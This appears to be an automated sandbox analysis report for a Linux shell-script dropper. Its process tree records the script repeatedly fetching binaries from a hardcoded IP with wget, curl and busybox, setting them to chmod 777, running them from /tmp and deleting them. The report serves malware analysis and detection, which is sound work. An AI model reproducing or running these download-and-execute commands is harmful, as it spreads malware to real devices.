Analysis
-
max time kernel
18s -
max time network
46s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
20/11/2024, 03:18
Static task
static1
Behavioral task
behavioral1
Sample
c056a582d436b69e831e6ef8abae1c532b79dcb3c12433b73fc27a447718b09e.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
c056a582d436b69e831e6ef8abae1c532b79dcb3c12433b73fc27a447718b09e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c056a582d436b69e831e6ef8abae1c532b79dcb3c12433b73fc27a447718b09e.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c056a582d436b69e831e6ef8abae1c532b79dcb3c12433b73fc27a447718b09e.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
c056a582d436b69e831e6ef8abae1c532b79dcb3c12433b73fc27a447718b09e.sh
-
Size
10KB
-
MD5
cdd6a3d3e08f6df591f6736ed154c56c
-
SHA1
00357309d336d5264e16b373b6fdc3db2287f423
-
SHA256
c056a582d436b69e831e6ef8abae1c532b79dcb3c12433b73fc27a447718b09e
-
SHA512
a0d9d2d0062a61b310633386b50680c48f52bca237df9bd40713b36bcc03157b57c0ee83b84bb7866ae7793f20503979f421f49466d7cb30d4cb72b8d9575395
-
SSDEEP
192:7URUBUxUGUaUGaygHDpneNHSttLGyeWufzapURUBUxUGUaUWaygHDDpttLGMeWuO:1eNH+eWufzaFeWufza
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 9 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 805 chmod 811 chmod 817 chmod 692 chmod 757 chmod 775 chmod 799 chmod 716 chmod 739 chmod -
Executes dropped EXE 9 IoCs
ioc pid Process /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP 693 UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m 717 j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX 741 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL 758 Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh 777 eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y 800 Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG 806 QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d 812 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s 818 hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s -
Checks CPU configuration 1 TTPs 9 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 9 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m curl File opened for modification /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh curl File opened for modification /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y curl File opened for modification /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG curl File opened for modification /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP curl File opened for modification /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX curl File opened for modification /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL curl File opened for modification /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d curl File opened for modification /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s curl
Processes
-
/tmp/c056a582d436b69e831e6ef8abae1c532b79dcb3c12433b73fc27a447718b09e.sh/tmp/c056a582d436b69e831e6ef8abae1c532b79dcb3c12433b73fc27a447718b09e.sh1⤵PID:661
-
/bin/rm/bin/rm bins.sh2⤵PID:663
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP2⤵PID:665
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:682
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP2⤵PID:690
-
-
/bin/chmodchmod 777 UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP2⤵
- File and Directory Permissions Modification
PID:692
-
-
/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP./UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP2⤵
- Executes dropped EXE
PID:693
-
-
/bin/rmrm UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP2⤵PID:694
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m2⤵PID:695
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:704
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m2⤵PID:711
-
-
/bin/chmodchmod 777 j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m2⤵
- File and Directory Permissions Modification
PID:716
-
-
/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m./j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m2⤵
- Executes dropped EXE
PID:717
-
-
/bin/rmrm j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m2⤵PID:719
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX2⤵PID:720
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:727
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX2⤵PID:733
-
-
/bin/chmodchmod 777 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX./1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX2⤵PID:742
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL2⤵PID:744
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL2⤵PID:756
-
-
/bin/chmodchmod 777 Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL./Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL2⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL2⤵PID:759
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh2⤵PID:760
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh2⤵PID:770
-
-
/bin/chmodchmod 777 eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh./eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh2⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh2⤵PID:778
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y2⤵PID:780
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:786
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y2⤵PID:794
-
-
/bin/chmodchmod 777 Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y./Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y2⤵PID:801
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG2⤵PID:802
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG2⤵PID:804
-
-
/bin/chmodchmod 777 QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG./QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG2⤵PID:807
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d2⤵PID:808
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d2⤵PID:810
-
-
/bin/chmodchmod 777 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d./0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d2⤵PID:813
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s2⤵PID:814
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s2⤵PID:816
-
-
/bin/chmodchmod 777 hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s./hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s2⤵PID:819
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t2⤵PID:820
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97